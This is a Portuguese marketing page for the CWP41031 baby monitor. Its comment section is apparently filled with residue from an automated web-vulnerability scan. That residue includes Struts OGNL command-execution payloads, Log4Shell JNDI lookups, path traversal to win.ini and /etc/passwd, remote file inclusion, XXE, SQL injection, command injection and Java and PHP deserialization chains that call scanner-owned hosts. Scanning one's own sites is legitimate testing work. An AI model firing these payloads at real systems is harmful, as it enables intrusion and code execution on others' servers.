Conheça o Baby monitor
A ansiedade em relação à segurança e bem-estar dos bebês durante o sono é uma preocupação comum entre os pais. De acordo com uma pesquisa recente, 72% dos pais relatam sentir essa ansiedade, especialmente devido à falta de monitoramento contínuo durante a noite. Essa ansiedade pode levar à interrupção do sono dos pais, causando cansaço, irritabilidade e até problemas de saúde mental a longo prazo (Petite Dreamers) (Parents).
Preocupação com o bebê
Os pais frequentemente se preocupam com o bem-estar dos seus bebês durante a noite, temendo que algo possa acontecer enquanto dormem. Essa preocupação pode resultar em noites mal dormidas e aumento do estresse, afetando a saúde e a disposição dos pais no dia seguinte. Estudos mostram que a falta de sono não só afeta o humor e a capacidade de tomar decisões, mas também pode comprometer o sistema imunológico e aumentar o risco de depressão.
O Baby Monitor CWP41031 foi desenvolvido para oferecer tranquilidade e conforto aos pais, permitindo o monitoramento contínuo e eficiente do bebê durante o sono. Com uma resolução de 4MP e uma imagem clara e rica em detalhes, os pais podem ver cada detalhe no ambiente do bebê. Além disso, o monitor oferece áudio bidirecional, permitindo que os pais ouçam e falem com o bebê a qualquer momento.
Principais características e benefícios
Monitoramento em tempo real
Através de uma conexão Wi-Fi de 2.4GHz, o Baby Monitor permite que os pais acompanhem o sono do bebê em tempo real, diretamente no aplicativo disponível para iOS e Android.
Detecção inteligente
O monitor possui funções de detecção de movimento, corpo humano e choro, temperatura e umidade do ambiente enviando notificações imediatas para o aplicativo quando qualquer atividade é detectada.
Áudio bidirecional
Com um microfone e um alto-falante integrados, os pais podem falar e acalmar o bebê enquanto estão longe.
Visão noturna infravermelha
Com um alcance de 10 metros, os pais podem monitorar o bebê mesmo em completa escuridão.
Luz colorida dimerizavel
O baby monitor conta com uma luz adicional que pode ser ligada na cor e intesidade desejada, para oferecer mais conforto ao bebê.
Armazenamento Flexível
Suporte para cartão micro SD de até 128GB ou armazenamento remoto, garantindo que todos os momentos importantes sejam registrados.
Alarmes Inteligentes
Avisos de cartão SD cheio, erros no cartão SD e alarme de alimentação, mantendo os pais informados sobre o status do monitor.
Canções de ninar na câmera
Para auxiliar o bebê em seu descanso, a câmera possui algumas canções de ninar que podem ser ligadas a qualquer momento, tranquilizando o bebê.
Com o Baby Monitor, os pais podem dormir mais tranquilos sabendo que estão sempre de olho no bebê. As notificações imediatas e o acesso fácil pelo aplicativo proporcionam uma sensação de controle e segurança, reduzindo significativamente a ansiedade. Além disso, a função de áudio bidirecional permite que os pais confortem o bebê rapidamente, enquanto não estão com ele.
Se você é um pai preocupado com o sono e a segurança do seu bebê, o Baby Monitor é a solução ideal para suas noites tranquilas. Descubra mais sobre este incrível dispositivo e como ele pode transformar suas noites, proporcionando paz de espírito e bem-estar para toda a família.
1.160 Comments
nessus_was_text7w4ajmfg
https://xssrcqRIZclvV.was.tenable.com
nessus_was_text2jbvif29 tenable_wasscan_xss_in_tag=5f85432d-0af7-450f-9b84-7698c3ae6ffb blah=
nessus_was_textm34kmt9e${dns:address|y33lrzgg6eajdi6dv3jgwktmom3vwtynex24ai3jegbflx6mlpdq.was.nessus.org}
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((450*312))}’}))}
nessus_was_text3dyi37lm
nessus_was_text3kgb5ypj
nessus_was_text2izffom9
php://input
nessus_was_textcbdopz08
${jndi:ldap://was-log4shell-${date:yyyy}EWyqPt75qGcPwzKiLW6z.w.nessus.org}
was-tnb-knm
nessus_was_text6p0lgi1z
nessus_was_text72kkv9pv
${T(java.lang.System).properties}
nessus_was_textcre6f32i
type C:\Windows\win.ini
nessus_was_textkmxys5l2
nessus_was_textdsr9w32u
/../../../../../../../../../../windows/win.ini
nessus_was_textk7sc1n9a
nessus_was_text6d983a3t
nessus_was_textydh0z54d
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textnjywzp78
nessus_was_textm9zu7p1u
@(“tnbwas_HVT1dkmZQih4″+9952*1676)
nessus_was_texthlog8b9c
nessus_was_texthiqy9le0
nessus_was_text6yqm6jhc
nessus_was_textrzodvbgh
nessus_was_text391gdfr9
nessus_was_textv8m0wtj0
//mdxtelecom.com.br.5f85432d-0af7-450f-9b84-7698c3ae6ffb.com
<!DOCTYPE test []>&xxe;
nessus_was_text2oklio06′”
Version:|Vendor:
nessus_was_textz6bzejti
nessus_was_textkspc9wqm
nessus_was_text4tk8j22y
wasxsscontext3d4f6l
nessus_was_textt9zub9tx
nessus_was_textx8laxjly${dns:address|5ccmn5wt2egskf42z27wwuhd75rk6jsgirzop5furvyim7dmbysq.was.nessus.org}
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((931*749))}’}))}
nessus_was_text7445g34n
‘tnbwas_eO0MWRPfZv1C’+4133*9065
nessus_was_textoci99orl
nessus_was_texti6t2xugd
nessus_was_textn7enb7j8
nessus_was_textnt8zn45s
nessus_was_textwelzn35n
was-tnb-drr
nessus_was_textfajo6a94
nessus_was_textdqqtgwmn
${T(java.lang.System).properties}
type C:\Windows\win.ini
|id
nessus_was_textboupxnps
/../../../../../../../../../../windows/win.ini
nessus_was_textn87tedt8
nessus_was_textyquk954r
nessus_was_textxe5pdbic
https://rfi.nessus.org/rfi.txt
nessus_was_text5czq9zbr
nessus_was_texthiaqbmwu
nessus_was_textw0cukjqf
nessus_was_textqge37t98
nessus_was_text8m701ko8
{{“50112480” | printf “%s%s” “tnbwas_O2vJ0L6keIrW”}}
nessus_was_texto1bhchta
{“tnbwas_O2vJ0L6keIrW”}{9491*5280}
nessus_was_textrlh2jlx5
nessus_was_texthaa9tojd
nessus_was_textungw5mbd
f633cbd7-d62a-4071-98ad-662cc60ed701.com
nessus_was_textqgvityga
<!DOCTYPE test []>&xxe;
nessus_was_textl3djrflz'”
Version:|Vendor:
nessus_was_textx2avssgb
nessus_was_textsewjqs7b
wasxsscontext8n7s0b
nessus_was_text1i27esye
https://xssrcBNAiCTMo.was.tenable.com
nessus_was_textohlruqcn tenable_wasscan_xss_in_tag=f633cbd7-d62a-4071-98ad-662cc60ed701 blah=
nessus_was_textdt2y5xom${dns:address|b3mhspqo2w4r2foedhi7zv4kgbij7braziufyb3bqanhqz4ptu6q.was.nessus.org}
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((740*908))}’}))}
nessus_was_textkzssceg2
nessus_was_text7dlqx2vo
{{‘tnbwas_clGFOtL3Ih09’+4954*9388}}
nessus_was_textt4ijtlgz
php://input
nessus_was_textvmh1s53m
was-tnb-err
nessus_was_textj28qzoz0
nessus_was_text14h0v8if
nessus_was_textwolar4ts
nessus_was_textz0htx955
${T(java.lang.System).properties}
nessus_was_text083gpv8p
nessus_was_textog6h8n8r
type C:\Windows\win.ini
nessus_was_textnlg26j1k
nessus_was_textzdnvh5pn
nessus_was_textl6t15m2p
nessus_was_textbka8yv37
..;/..;/..;/..;/..;/..;/..;/..;/windows/win.ini
nessus_was_textd3p12dbq
nessus_was_text334irxqf
nessus_was_textds7autz8hTtPs://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textkcze1rox
nessus_was_text882fufnb
@(“tnbwas_IhsQJ9AsCCfE”+5718*5754)
nessus_was_text5999std1
nessus_was_textrysm76x9
tnbwas_IhsQJ9AsCCfE${5718*5754}
nessus_was_text1gm7dcga
nessus_was_textjldt66kq
nessus_was_texte65yzjpr”‘`–
01d771ec-a19b-479f-8636-d199513abda6.com
nessus_was_textor7xcntt
<!DOCTYPE test []>&xxe;
nessus_was_textkj22fzy2′”
Version:|Vendor:
nessus_was_textrkcn1rld
nessus_was_textmjozmeq5
nessus_was_textsj205dz7
wasxsscontext4i8t0c
nessus_was_textnd9ps5sg script:;tenable_wasscan_xss_in_element_event=01d771ec-a19b-479f-8636-d199513abda6//
https://xssrcprVWqhRG.was.tenable.com
nessus_was_textzbttsqjp tenable_wasscan_xss_in_tag=01d771ec-a19b-479f-8636-d199513abda6 blah=
nessus_was_textzz2c10hk${dns:address|yyglor2otgg45igln4xhebj3a5cjgtzfahmgqwowquysqvcusjxa.was.nessus.org}
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((521*870))}’}))}
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((625*926))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
‘tnbwas_8IQnnseNqWO0’+5954*2793
[[’tnbwas_8IQnnseNqWO0’+5954*2793]]
nessus_was_textgqhxb1t5
php://input
was-tnb-ovb
nessus_was_textbo95ovr5
${jndi:ldap://was-log4shell-${date:yyyy}4LEhWA9ytGROjK4irmMU.w.nessus.org}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://was-log4shell-${date:yyyy}xttsnEIAnO8qBdebPF1a.w.nessus.org}
was-tnb-ggm
nessus_was_textia0fx9o3#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_text2imrwjzc’;.”)
nessus_was_textugwbvfv1type C:\Windows\win.ini
nessus_was_texttaesreg6
nessus_was_textn3kiceq1`id`
|echo aXk0c2YyMnl2M2QyNnd3NHNueXo3N3puc2VtNjVtcG40c21rbHJ0b3BoN3p5cHZ1cGl0cS53YXMubmVzc3VzLm9yZw== | base64 -d | xargs getent ahosts
nessus_was_texte4303ecf
nessus_was_textwovxw1mr
nessus_was_textfvyi400e
nessus_was_text56h3gpoc
nessus_was_textln29kwmt
nessus_was_texte3o0ikzv
nessus_was_text2n1hixmu
nessus_was_textkhshft3x
nessus_was_textwsnhqeyo
nessus_was_textfznzay6nhTtPs://rfi.nessus.org/rfi.txt
rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_textbr6ahupg
nessus_was_text4l3pxcw4
nessus_was_textu9h78ri6
nessus_was_texttdi5t6wu
@(“tnbwas_0EXiF1LBq6Kn”+9406*1905)
nessus_was_textgdq116a2
nessus_was_textxgl0nrna
nessus_was_textl308rfv8
nessus_was_textyav191a8
}${“tnbwas_0EXiF1LBq6Kn”+str(9406*1905)}
nessus_was_textznnh5mim
#{require ‘resolv’;Resolv.getaddress ‘2wusoity42xcri734e3n2vawfmaicvmsgnmzdyswltqysppg6chq’+’.was.nessus.org’ }
nessus_was_text4n8cpfay”‘`–
0841ca7f-8b08-4865-b751-ee4e9852c63e.com
nessus_was_text0r5wj0in
<!DOCTYPE test []>&xxe;
nessus_was_textyyp3njtv
nessus_was_texth57wo23j'”
Version:|Vendor:
nessus_was_texte39n7jrz
()”&%1′-;’
nessus_was_textiptj5brl
wasxsscontext6j0s3o
nessus_was_textlk22hcfw
nessus_was_textxma9fp2c
nessus_was_texth7sntlmd tenable_wasscan_xss_in_tag=0841ca7f-8b08-4865-b751-ee4e9852c63e blah=
nessus_was_textam39gi10
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((901*626))}’}))}
nessus_was_textomgs6vjv
nessus_was_textstvl88h8
nessus_was_texte0bql1qu
nessus_was_text36aqhpo0
nessus_was_textszhlb9ip
nessus_was_texttqgxelj2
${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”rrf4hd5okmiaj3sm2q7hruirzpgblhtrkw5da2cplxbjo3vgqzbq”+”.was.nessus.org”)}
nessus_was_textaqfah8d9
${jndi:ldap://was-log4shell-${date:yyyy}A4WQzjHBjcm0vTvf4bei.w.nessus.org}
was-tnb-dgh
nessus_was_textzk8siyig#^($!@$)(()))******
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textxuj5d9zf
nessus_was_text5rnez69i
type C:\Windows\win.ini
nessus_was_text5ab5z5zw
nessus_was_textjq4p5pxb
/../../../../../../../../../../windows/win.ini
nessus_was_textu7exm4wg
nessus_was_textla9bnroy
nessus_was_textl4hqao22
https://rfi.nessus.org/rfi.txt
file:///etc/passwd
nessus_was_text5w32v8zf
nessus_was_textm2nm70y6
nessus_was_textlpna3qit
nessus_was_text85hw5z5k
nessus_was_textbgfbdowr
nessus_was_texta0im8p9y
nessus_was_texthh2znf4x
nessus_was_textlbe0wf6f
553ff800-5c01-4803-bfe5-4d0061afe28a.com
https://553ff800-5c01-4803-bfe5-4d0061afe28a.com?x=https://mdxtelecom.com.br/
<!DOCTYPE test []>&xxe;
nessus_was_texttrorhwmj
Version:|Vendor:
nessus_was_textillutxlk
window.top._tenable_wasscan_js_namespace_taint_tracer.log_execution_flow_sink()
nessus_was_textp11w4ypk
nessus_was_text4oyiybzx
https://xssrccRGcNBTY.was.tenable.com
nessus_was_text77flytds tenable_wasscan_xss_in_tag=553ff800-5c01-4803-bfe5-4d0061afe28a blah=
nessus_was_texth82surz7
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((871*755))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((967*992))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_XV8F8i6BfFOC’+9363*6870
nessus_was_textr0ft4im0
nessus_was_text8bs7d75w
php://input
was-tnb-zbs
nessus_was_textq7uh9gfw
nessus_was_textq7m82rp0
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043687078637636626c666d737069696a72716e75323579796e71366f6765726862376c646876776b746c3678796c666669336368612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f687078637636626c666d737069696a72716e75323579796e71366f6765726862376c646876776b746c3678796c666669336368612e7761732e6e65737375732e6f726778
nessus_was_textb8pkj4pe#^($!@$)(()))******
C:/windows/win.ini
nessus_was_text72eukpmk’;.”)
nessus_was_textx4wk52tk
abcd
nessus_was_textu7thmd5c
|type C:\Windows\win.ini
nessus_was_text1f3l7yr3|id
nessus_was_textbxqbqyan
/../../../../../../../../../../windows/win.ini
nessus_was_textuwmhrbm3
nessus_was_text3rwtflfs
nessus_was_textww065nql
nessus_was_textiw0le4c9
https://rfi.nessus.org/rfi.txt
nessus_was_textzc76uth3
YToyOntpOjc7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzIjo0OntzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAG9wdGlvbnMiO2E6MTp7czoxODoiY3JlYXRlX25ld19jb25zb2xlIjtpOjA7fXM6NDc6IgBTeW1mb255XENvbXBvbmVudFxQcm9jZXNzXFByb2Nlc3MAcHJvY2Vzc1BpcGVzIjtPOjE0OiJDYWtlXE9STVxUYWJsZSI6MTp7czoxMzoiACoAX2JlaGF2aW9ycyI7TzoyNToiQ2FrZVxPUk1cQmVoYXZpb3JSZWdpc3RyeSI6Mjp7czoxMzoiACoAX21ldGhvZE1hcCI7YToxOntzOjEyOiJyZWFkYW5kd3JpdGUiO2E6Mjp7aTowO3M6MjoibWIiO2k6MTtzOjU6ImZldGNoIjt9fXM6MTA6IgAqAF9sb2FkZWQiO2E6MTp7czoyOiJtYiI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQ2FsbGJhY2tTdGF0ZW1lbnQiOjI6e3M6MTI6IgAqAF9jYWxsYmFjayI7czoxMzoiZ2V0aG9zdGJ5bmFtZSI7czoxMzoiACoAX3N0YXRlbWVudCI7Tzo0MToiQ2FrZVxEYXRhYmFzZVxTdGF0ZW1lbnRcQnVmZmVyZWRTdGF0ZW1lbnQiOjM6e3M6MTQ6IgAqAF9hbGxGZXRjaGVkIjtpOjE7czo5OiIAKgBidWZmZXIiO2E6MTp7aTowO3M6Njc6ImF2dnBqNzVuYWQ0Z291dG9leW5lZGZlZzNqcnh3bm9yd3Rlc3l6c251cTZwc3NsZTZjeWEud2FzLm5lc3N1cy5vcmciO31zOjg6IgAqAGluZGV4IjtpOjA7fX19fX1zOjQxOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHN0YXR1cyI7czo3OiJzdGFydGVkIjtzOjQyOiIAU3ltZm9ueVxDb21wb25lbnRcUHJvY2Vzc1xQcm9jZXNzAHByb2Nlc3MiO2k6MTt9aTo3O2k6Nzt9
a:2:{i:7;O:24:”GuzzleHttp\Psr7\FnStream”:2:{s:33:”GuzzleHttp\Psr7\FnStreammethods”;a:1:{s:5:”close”;a:2:{i:0;O:23:”GuzzleHttp\HandlerStack”:3:{s:32:”GuzzleHttp\HandlerStackhandler”;s:11:”tenable.was”;s:30:”GuzzleHttp\HandlerStackstack”;a:1:{i:0;a:1:{i:0;s:13:”gethostbyname”;}}s:31:”GuzzleHttp\HandlerStackcached”;b:0;}i:1;s:7:”resolve”;}}s:9:”_fn_close”;a:2:{i:0;O:23:”GuzzleHttp\HandlerStack”:3:{s:32:”GuzzleHttp\HandlerStackhandler”;s:11:”tenable.was”;s:30:”GuzzleHttp\HandlerStackstack”;a:1:{i:0;a:1:{i:0;s:13:”gethostbyname”;}}s:31:”GuzzleHttp\HandlerStackcached”;b:0;}i:1;s:7:”resolve”;}}i:7;i:7;}
nessus_was_textfo2qilcp
a:2:{i:7;O:27:”think\process\pipes\Windows”:1:{s:34:”think\process\pipes\Windowsfiles”;a:1:{i:0;O:17:”think\model\Pivot”:3:{s:17:”think\Modeldata”;a:1:{s:5:”smi1e”;s:11:”tenable.was”;}s:21:”think\ModelwithAttr”;a:1:{s:5:”smi1e”;s:6:”system”;}s:9:”*append”;a:1:{s:5:”smi1e”;s:1:”1″;}}}}i:7;i:7;}
nessus_was_textw1q38ftx
file:///etc/passwd
nessus_was_textdxetasif
nessus_was_textw2tx8rzr
nessus_was_textvvnzksmv
nessus_was_texthtn107cj
nessus_was_texta85ooatf
nessus_was_texts495ussr
nessus_was_text9221vrrk
nessus_was_textzyxpnqwg”‘`–
nessus_was_textg0lbeny9
nessus_was_textka1lnsje
nessus_was_textalbfayxg
<!DOCTYPE test []>&xxe;
nessus_was_textjahfdrae
Version:|Vendor:
nessus_was_textcnpnghuo
nessus_was_texttbevvmm9
wasxsscontext3d4v5l
nessus_was_textartsokgw script:;tenable_wasscan_xss_in_element_event=c773c212-8cbf-4fe1-bc79-e64bfd8d19be//
https://xssrcfkaAuJGA.was.tenable.com
nessus_was_text4g1dev7v tenable_wasscan_xss_in_tag=c773c212-8cbf-4fe1-bc79-e64bfd8d19be blah=
nessus_was_textnet4h9dr
abcd
nessus_was_textdcg7d6fk
6339
-1756
nessus_was_text0ozkg4pk
-1839
nessus_was_textajehh3rj
1′ limit 0, 1386 —
nessus_was_text3474pfwe
(select (case when (6339=6339) then 1 else (select 1 union select 2) end))– +
nessus_was_text6bv4wf12
10002
-1845
-1756
sleep 4
nessus_was_textneu6b1pk
nessus_was_textmylftggb
nessus_was_text58o04aup
nessus_was_text3i42axkd
nessus_was_text638a9kw9
sleep(4);
nessus_was_textlb0cwasn
nessus_was_textth6nr4v0 AND (SELECT 6757 FROM (SELECT(SLEEP(2)))JZJLK)
nessus_was_texttlh2dg8z
nessus_was_textsvuvo1vg
nessus_was_texte1hbntwj
nessus_was_text911k14jc
nessus_was_texto6lw4gvx
nessus_was_textt7o3a749
nessus_was_textkgtt5ngl
nessus_was_text4vguhjne
nessus_was_text1qw08bfi
nessus_was_text78jubrkp
;select pg_sleep(2); — ‘;select pg_sleep(2); — “;select pg_sleep(2); — –
nessus_was_text6r92i820
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo WAS-$((164*574))’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘powershell.exe’,’-nop’,’-c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
%{#_memberAccess.allowPrivateAccess=true,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludedClasses=#_memberAccess.acceptProperties,#_memberAccess.excludedPackageNamePatterns=#_memberAccess.acceptProperties,#res=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=@java.lang.Runtime@getRuntime(),#s=new java.util.Scanner(#a.exec(‘bash -c {echo,WAS-$((527*626))}’).getInputStream()).useDelimiter(‘\\A’),#str=#s.hasNext()?#s.next():”,#res.print(#str),#res.close()
}
‘tnbwas_Ejal6BOwSuEw’+3050*1350
nessus_was_text46bp4d8y
nessus_was_textzj97be9j
nessus_was_text9701a95f
php://input
was-tnb-uqh
nessus_was_textetz157dg
${jndi:ldap://was-log4shell-${date:yyyy}kqYh4PUWzTFWKT4Fti1l.w.nessus.org}
aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740043733771716166767261767a6b70616e356b696f6470346b646e6f6b75663776366268636d6a6f34706a65766274373569736c63612e7761732e6e65737375732e6f726774000071007e00057400056874747073707874004b68747470733a2f2f733771716166767261767a6b70616e356b696f6470346b646e6f6b75663776366268636d6a6f34706a65766274373569736c63612e7761732e6e65737375732e6f726778
nessus_was_textvexcs2pu
C:/windows/win.ini
${T(java.lang.System).properties}
nessus_was_textqhnqlpn0
abcd
nessus_was_textraxbpe70
nessus_was_texte2dypzif
nessus_was_textutaw1cyw
/../../../../../../../../../../windows/win.ini
…/./…/./…/./…/./…/./…/./…/./…/./windows/win.ini
nessus_was_textju7jb6xv
nessus_was_textll28m4xh
%2E%2E%2FWEB-INF%2Fweb.xml
https://rfi.nessus.org/rfi.txt
nessus_was_texturqaoz4o
